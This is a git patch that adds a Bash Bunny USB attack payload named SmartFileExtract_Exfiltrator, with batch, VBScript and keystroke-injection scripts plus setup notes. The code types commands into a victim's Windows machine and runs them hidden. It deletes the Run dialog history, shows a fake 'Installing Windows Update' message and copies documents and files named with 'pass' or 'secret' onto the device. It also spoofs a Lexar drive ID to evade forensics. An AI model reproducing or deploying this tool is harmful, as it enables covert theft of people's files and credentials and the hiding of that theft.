From 08c24c43898c5c817d0d6a2114097e63c75989e2 Mon Sep 17 00:00:00 2001 From: saintcrossbow Date: Sun, 26 Nov 2017 20:16:17 -0500 Subject: [PATCH] Added SmartFileExtract payload (#296) --- .../SmartFileExtract_Exfiltrator/d.cmd | 4 +++ .../SmartFileExtract_Exfiltrator/e.cmd | 25 ++++++++++++++++ .../SmartFileExtract_Exfiltrator/i.vbs | 1 + .../SmartFileExtract_Exfiltrator/payload.txt | 29 +++++++++++++++++++ .../SmartFileExtract_Exfiltrator/readme.md | 1 + .../SmartFileExtract_Exfiltrator/setup.txt | 26 +++++++++++++++++ 6 files changed, 86 insertions(+) create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md create mode 100644 payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd new file mode 100644 index 00000000..6a9b17a4 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/d.cmd @@ -0,0 +1,4 @@ +@echo off +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell" +cscript %~dp0\i.vbs %~dp0\e.cmd +@exit \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd new file mode 100644 index 00000000..2912df65 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/e.cmd @@ -0,0 +1,25 @@ +REM Setup required: +REM o Create SFE in the loot directory +REM o Place SmartFileExtract on the root of the bashbunny +@echo off +@echo Installing Windows Update + +REM Delete registry keys storing Run dialog history +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +REM Creates directory compromised of computer name, date and time +REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious +set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +mkdir %dst% >>nul + + +if Exist %USERPROFILE%\Documents ( +%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul + +) + +REM Blink CAPSLOCK key +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" + +@cls +@exit \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs new file mode 100644 index 00000000..fb7cb768 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/i.vbs @@ -0,0 +1 @@ +CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt new file mode 100644 index 00000000..613546a8 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt @@ -0,0 +1,29 @@ +#!/bin/bash +# +# Title: ExecutableInstaller +# Author: IMcPwn (original) +# Additions: SaintCrossbow (only for the parts to run SFE) +# Version: 1.0 +# Target: Windows 7+ +# +# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies payload.exe from the root of the Bash Bunny and then executes it +# using the --startup parameter. Change these settings inside of e.cmd. +# + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +LED R +# Note: Acting as Lexar Compact Flash Drive to throw off forensics +ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081 +QUACK DELAY 200 +REM --> Minimize all windows +QUACK WINDOWS d +QUACK DELAY 200 +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')" +QUACK ENTER +LED G diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md new file mode 100644 index 00000000..b2f37533 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/readme.md @@ -0,0 +1 @@ +# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied. \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt new file mode 100644 index 00000000..04e15654 --- /dev/null +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/setup.txt @@ -0,0 +1,26 @@ +Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller. +See the BashBunny Wiki for the original version. + +Setup: +- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract + * Quick tip: you only need the SmartFileExtract.exe from the project root +- Copy SmartFileExtract.exe to the root of the bashubunny +- Change payload.txt: + a) Your file volume name for the bashbunny (if necessary) + b) What kind of device you want the bunny to spoof. + Note: Very much recommend you do this, otherwise will be picked up by forensics +- Change e.cmd: + a) Change your options for Smart File Extract here. + +The default payload included in this distribution: +- Looks to Forensics like a Lexar drive (but still called BashBunny) +- Finds all files with a) the word secret or pass in the filename as well as b) any doc files +- Reports status as a fake install window +- Stops extract after 90 seconds or 500 MBs + +SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run: +smartfileextract /help + +Good luck! + +Saint Crossbow \ No newline at end of file